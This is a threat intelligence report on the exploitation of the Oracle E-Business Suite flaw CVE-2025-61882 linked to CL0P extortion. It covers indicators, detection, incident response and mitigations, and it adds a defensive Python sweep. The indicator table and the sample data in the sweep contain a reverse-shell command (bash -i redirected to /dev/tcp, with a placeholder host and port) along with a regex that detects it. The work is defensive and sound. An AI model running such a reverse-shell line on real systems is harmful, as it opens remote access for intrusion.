1. Executive Summary
In October 2025, multiple threat intelligence and government sources reported active exploitation of a critical, unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. Oracle confirmed the issue and released an out-of-band Security Alert with patches and indicators of compromise, while CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalogue—strongly suggesting real-world exploitation at scale. (oracle.com)
Reporting from Google Threat Intelligence and CrowdStrike linked the activity to the CL0P/Clop extortion ecosystem, describing a campaign focused on data theft and extortion rather than immediate ransomware deployment. (Google Cloud)
Organisations running internet-facing Oracle EBS (12.2.3–12.2.14) should treat this as a high-priority incident-response scenario: patching alone may be insufficient if compromise predates remediation. (NVD)
2. Contextual Background
2.1 Nature of the threat
CVE-2025-61882 impacts Oracle EBS Oracle Concurrent Processing (component: BI Publisher Integration) and is rated CVSS 9.8. It is remotely exploitable without authentication over HTTP and can enable takeover/remote code execution. (oracle.com)
Oracle issued an out-of-band Security Alert Advisory and urged customers to apply updates “as soon as possible,” noting prerequisite patching requirements (including prior CPU dependencies). (oracle.com)
Key references
- Oracle vendor advisory: Oracle Security Alert Advisory for CVE-2025-61882. (oracle.com)
- NVD entry: CVE-2025-61882. (NVD)
2.2 Threat-actor attribution
Several sources associate the campaign with the CL0P brand and its broader extortion operations:
- Google Threat Intelligence describes a “CL0P extortion campaign” following months of intrusion activity and exploitation as early as 9 August 2025. (Google Cloud)
- CrowdStrike assesses with moderate confidence that GRACEFUL SPIDER is likely involved (a tracker often associated with Clop-linked activity), while acknowledging the possibility of multiple actors exploiting the same CVE. (CrowdStrike)
- Reuters reported Oracle customer extortion emails and noted Google’s linkage of the activity to cl0p. (Reuters)
Confidence (Admiralty/NATO style): Likely
Based on multiple reputable sources linking the extortion operation to the CL0P ecosystem, but with explicit caveats that more than one actor may have leveraged the vulnerability. (Google Cloud)
2.3 Sector and geographic targeting
The campaign appears broad and opportunistic, consistent with prior CL0P-style “mass exploitation → data theft → delayed extortion” operations. Google notes high-volume outreach to executives and evidence of exfiltrated file listings to substantiate claims, suggesting multi-sector targeting. (Google Cloud)
UK-facing impact has been referenced in public reporting and alerts, including coverage of NHS-related claims (not all of which are independently verifiable without victim confirmation). (bankinfosecurity.com)
3. Technical Analysis
3.1 Vulnerability and TTP overview (mapped to MITRE ATT&CK)
The observed activity described by Oracle, Google, and CrowdStrike aligns to the following ATT&CK techniques (mapping is an analyst interpretation based on behaviours described in cited reporting):
- Initial access via exploitation of an internet-facing enterprise application: T1190 (Google Cloud)
- Execution of shell commands on compromised hosts (Oracle-provided observed command indicates interactive shell and outbound TCP): T1059 (oracle.com)
- Data theft and extortion model (exfiltration to enable coercion): TA0010 Exfiltration (specific sub-technique depends on observed channel; sources indicate substantial data exfiltration but do not fully enumerate transport for all cases). (Google Cloud)
Google further reports a multi-stage Java implant framework used to compromise EBS environments, indicating post-exploitation tooling beyond a single-shot exploit. (Google Cloud)
3.2 Exploitation status and PoC availability
- Confirmed active exploitation: Oracle’s Security Alert and multiple government/industry sources describe exploitation “in the wild.” (oracle.com)
- CISA KEV listing: Inclusion in KEV is a strong signal of exploitation affecting real organisations and triggers US federal remediation deadlines. (CISA)
- Public PoC code: Public repositories purport to provide PoC/exploit code for CVE-2025-61882. Treat these as dangerous and assume weaponisation risk increased after disclosure. (GitHub)
4. Impact Assessment
4.1 Severity and scope
CVE-2025-61882 is CVSS 9.8 (Critical) and allows unauthenticated compromise of a core EBS component. (NVD)
Campaign reporting indicates data exfiltration and extortion, with Oracle customers receiving extortion emails claiming theft from Oracle EBS applications. (Google Cloud)
4.2 Victim profile
Most at-risk are organisations with:
- Internet-exposed Oracle EBS instances (especially those behind weak perimeter controls)
- Unpatched versions in the affected range (12.2.3–12.2.14) (NVD)
5. Indicators of Compromise (IOCs)
5.1 IOC table
Below are vendor-published IOCs (plus campaign-specific infrastructure reported by Google). Do not treat absence of these IOCs as proof of safety—Oracle explicitly notes indicators represent observed activity “not limited to CVE-2025-61882.” (oracle.com)
| Type | Value | Context / Notes | Source |
|---|---|---|---|
| IP address | 200[.]107[.]207[.]26 | Potential GET/POST activity (observed) | Oracle Security Alert (oracle.com) |
| IP address | 185[.]181[.]60[.]11 | Potential GET/POST activity (observed) | Oracle Security Alert (oracle.com) |
| Command | sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Observed command consistent with establishing an outbound interactive shell over TCP (destination host and port both omitted in Oracle's table) | Oracle Security Alert (oracle.com) |
| SHA-256 | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | Hash associated with a purported EBS exploit archive shared publicly (also referenced by CrowdStrike) | Oracle Security Alert; CrowdStrike (oracle.com) |
| Email contact | [email protected] | Extortion email contact observed in campaign reporting | Google Threat Intelligence (Google Cloud) |
| Email contact | [email protected] | Extortion email contact observed in campaign reporting | Google Threat Intelligence (Google Cloud) |
5.2 Detection guidance
- Network detections: Alert on suspicious/novel inbound requests to EBS endpoints associated with BI Publisher integration / Concurrent Processing, especially from untrusted geographies or IPs with no prior business justification. (Vendor and CTI reporting indicates HTTP-based unauthenticated exploitation.) (NVD)
- Threat hunting: Prioritise log review for unexpected process execution spawned by EBS application services, and outbound connections indicative of interactive shells (Oracle’s observed command suggests this pattern). (oracle.com)
- Leverage public detections where appropriate: SOC Prime and other detection communities published content around CVE-2025-61882 hunting. Validate rules in a test environment before production deployment. (SOC Prime)
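The following is an added example, not content from Oracle, Google, CrowdStrike or the other sources cited above, of a defensive sweep that applies the IOC table (5.1) and the detection and hunting guidance (5.2, 6.2) to sample telemetry: HTTP access log lines, process-creation events and firewall egress records, plus file hashes and EBS version strings. All log lines, hostnames, IPs other than the Oracle-published IOCs, and the EBS parent-process names are constructed placeholders; in particular the reverse-shell destination 198.51.100.7:4444 is a documentation-range value standing in for the host/port Oracle omitted.

```python
"""Defensive sweep over constructed sample telemetry for the indicators described in
sections 5.1, 5.2 and 6.2. Added example; not code from Oracle or any cited vendor."""
import re
from typing import Dict, List, Tuple

# IOC values taken from the Oracle Security Alert table above (de-fanged form refanged here).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {"76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d"}

# Generalisation of Oracle's observed command: an interactive bash whose stdout/stderr
# are redirected into a /dev/tcp/<host>/<port> pseudo-device (outbound shell over TCP).
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\b.*>&\s*/dev/tcp/", re.IGNORECASE)

# ASSUMPTION: placeholder names for EBS application-tier parent processes; replace with
# the real binaries/service accounts of your deployment (the page does not name them).
EBS_PARENT_PROCESSES = {"java", "FNDLIBR", "httpd"}
SHELL_BINARIES = {"sh", "bash", "dash"}

# Affected range stated in the NVD entry (12.2.3 to 12.2.14). A version inside the range
# only means "check patch state"; a patched instance still reports the same version.
AFFECTED_MIN, AFFECTED_MAX = (12, 2, 3), (12, 2, 14)


def refang(value: str) -> str:
    """Turn 200[.]107[.]207[.]26 into 200.107.207.26 so de-fanged IOC lists load cleanly."""
    return value.replace("[.]", ".")


def is_affected_version(version: str) -> bool:
    """True if an EBS version string falls inside the affected range."""
    parsed: Tuple[int, ...] = tuple(int(p) for p in version.split("."))
    return AFFECTED_MIN <= parsed <= AFFECTED_MAX


def check_access_log(line: str) -> List[str]:
    """Combined-format HTTP access log line: flag requests sourced from IOC IPs."""
    src_ip = line.split(" ", 1)[0]
    return [f"access: request from Oracle-published IOC IP {src_ip}"] if src_ip in IOC_IPS else []


def check_process_event(event: Dict[str, str]) -> List[str]:
    """Process-creation event with 'parent', 'image' and 'cmdline' keys."""
    findings = []
    if REVERSE_SHELL_RE.search(event["cmdline"]):
        findings.append("process: interactive shell redirected to /dev/tcp (reverse-shell pattern)")
    if event["parent"] in EBS_PARENT_PROCESSES and event["image"] in SHELL_BINARIES:
        findings.append(f"process: EBS-tier process {event['parent']} spawned {event['image']}")
    return findings


def check_egress(line: str) -> List[str]:
    """Firewall egress record 'src dst:port action': flag connections to IOC IPs."""
    _src, dst_port, _action = line.split()
    dst = dst_port.rsplit(":", 1)[0]
    return [f"egress: outbound connection to IOC IP {dst}"] if dst in IOC_IPS else []


def check_file_hash(sha256: str) -> List[str]:
    """Flag files whose SHA-256 matches the hash from the Oracle/CrowdStrike reporting."""
    return [f"file: SHA-256 {sha256[:12]}... matches published IOC"] if sha256.lower() in IOC_SHA256 else []


# Constructed sample inputs (not real telemetry).
SAMPLE_ACCESS = [
    '10.0.0.5 - - [09/Oct/2025:10:01:12 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512',
    '200.107.207.26 - - [09/Oct/2025:10:02:40 +0000] "POST /OA_HTML/AppsLogin HTTP/1.1" 200 88',
]
SAMPLE_PROCESSES = [
    {"parent": "java", "image": "sh",
     "cmdline": "sh -c /bin/bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"},  # constructed host/port
    {"parent": "sshd", "image": "bash", "cmdline": "bash -l"},             # admin login, benign
    {"parent": "java", "image": "ls", "cmdline": "ls -la /tmp"},           # not a shell binary
]
SAMPLE_EGRESS = [
    "10.0.0.12 185.181.60.11:443 ALLOW",
    "10.0.0.12 10.0.0.20:1521 ALLOW",  # internal database traffic, benign
]
SAMPLE_HASHES = [
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "0" * 64,  # constructed non-matching hash
]


def run_sweep() -> List[str]:
    """Run every check over the sample inputs and return the combined findings."""
    findings: List[str] = []
    for line in SAMPLE_ACCESS:
        findings += check_access_log(line)
    for event in SAMPLE_PROCESSES:
        findings += check_process_event(event)
    for line in SAMPLE_EGRESS:
        findings += check_egress(line)
    for digest in SAMPLE_HASHES:
        findings += check_file_hash(digest)
    return findings


if __name__ == "__main__":
    for finding in run_sweep():
        print(finding)
    print("12.2.10 in affected range:", is_affected_version("12.2.10"))
```

The process check deliberately fires on two independent signals (the `/dev/tcp/` redirection and an EBS-tier parent spawning a shell) so that a hit on either survives an attacker changing the exact command; as section 5.1 notes, a clean sweep is not proof of safety, since Oracle's indicators reflect observed activity only.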
6. Incident Response Guidance
6.1 Containment, eradication, recovery
- Containment
  - If feasible, remove Oracle EBS from direct internet exposure immediately (restrict via VPN, allowlists, reverse proxy/WAF).
  - Block Oracle-published malicious IPs at perimeter controls while you investigate. (oracle.com)
- Eradication
  - Apply Oracle’s Security Alert patches for CVE-2025-61882 and ensure prerequisite patches are met (Oracle notes prerequisite CPU dependencies). (oracle.com)
  - Hunt for persistence and implants (Google describes a multi-stage Java implant framework). (Google Cloud)
- Recovery
  - Rotate credentials associated with EBS application/service accounts and any identities accessible from the EBS host.
  - Rebuild systems if integrity cannot be assured; restore from known-good backups and validate before re-exposure.
6.2 Forensic artefacts to collect
- EBS application logs (access/error), reverse proxy/WAF logs, and any HTTP request logs around suspected exploitation windows (noting activity as early as July–August 2025 in reporting). (Google Cloud)
- Process execution telemetry and parent/child process trees on EBS servers (to validate command execution patterns). (oracle.com)
- Egress logs (firewall, proxy, DNS) to identify data exfiltration channels.
6.3 Lessons learned
- Treat ERP/enterprise application exposure as equivalent to exposing identity infrastructure: minimise attack surface, enforce layered controls, and instrument aggressively.
7. Threat Intelligence Contextualisation
7.1 Similar campaign patterns
Google highlights a model associated with CL0P-branded activity: mass exploitation of high-value enterprise software → data theft → delayed extortion, previously seen in managed file transfer (MFT) campaigns. (Google Cloud)
This matters operationally: defenders often see “quiet” intrusion and exfiltration weeks before public naming-and-shaming or leak-site posting. (Google Cloud)
7.2 ATT&CK lifecycle mapping (observed/assessed)
| Tactic | Technique ID | Technique Name | Observed behaviour |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | Unauthenticated exploitation of Oracle EBS via CVE-2025-61882 (HTTP) (NVD) |
| Execution | T1059 | Command and Scripting Interpreter | Oracle-published observed shell command indicating interactive shell execution (oracle.com) |
| Exfiltration | TA0010 | Exfiltration (tactic) | Google/CrowdStrike describe data exfiltration as campaign objective (Google Cloud) |
8. Mitigation Recommendations
8.1 Hardening and configuration
- Patch immediately using Oracle’s Security Alert guidance and ensure prerequisite CPUs are applied. (oracle.com)
- Reduce exposure: Keep EBS behind a VPN or dedicated access gateway; limit inbound management and application paths to known IP ranges.
- Add compensating controls: WAF rules, strict request validation, and anomaly detection for rare endpoints within EBS components.
8.2 Patch management priorities
- Prioritise CVE-2025-61882 (CVSS 9.8) and any follow-on EBS issues referenced in ongoing reporting, given demonstrated exploitation and KEV inclusion. (NVD)
- Where patching requires downtime, implement emergency containment (isolation and strict allowlisting) until maintenance windows can be executed.
9. Historical Context & Related Vulnerabilities
Oracle EBS has a history of high-impact vulnerabilities drawing attacker interest; threat reporting around this campaign also discusses additional EBS vulnerabilities and exploit chains observed in 2025 beyond CVE-2025-61882. (Google Cloud)
10. Future Outlook
Given the availability of public PoC tooling and the high value of EBS environments, opportunistic scanning and exploitation will likely continue, including by actors outside the CL0P ecosystem. (CrowdStrike)
Expect increased use of data theft-first extortion (rather than immediate encryption), because it reduces operational friction and speeds monetisation—especially against complex enterprise platforms. (Google Cloud)
11. Further Reading
Vendor / Government
- Oracle Security Alert Advisory for CVE-2025-61882 (oracle.com)
- NVD entry for CVE-2025-61882 (NVD)
- CISA KEV catalogue entry for CVE-2025-61882 (CISA)
- NHS England cyber alert referencing exploitation of CVE-2025-61882 (NHS England Digital)
- Canadian Centre for Cyber Security alert (AL25-013) (Canadian Centre for Cyber Security)
Threat intelligence / Research
- Google Threat Intelligence: Oracle EBS zero-day exploited in widespread extortion campaign (Google Cloud)
- CrowdStrike: Campaign targeting Oracle EBS via CVE-2025-61882 (CrowdStrike)
- Rapid7 analysis of CVE-2025-61882 exploitation (Rapid7)
- watchTowr Labs technical write-up on the exploit chain (watchTowr Labs)
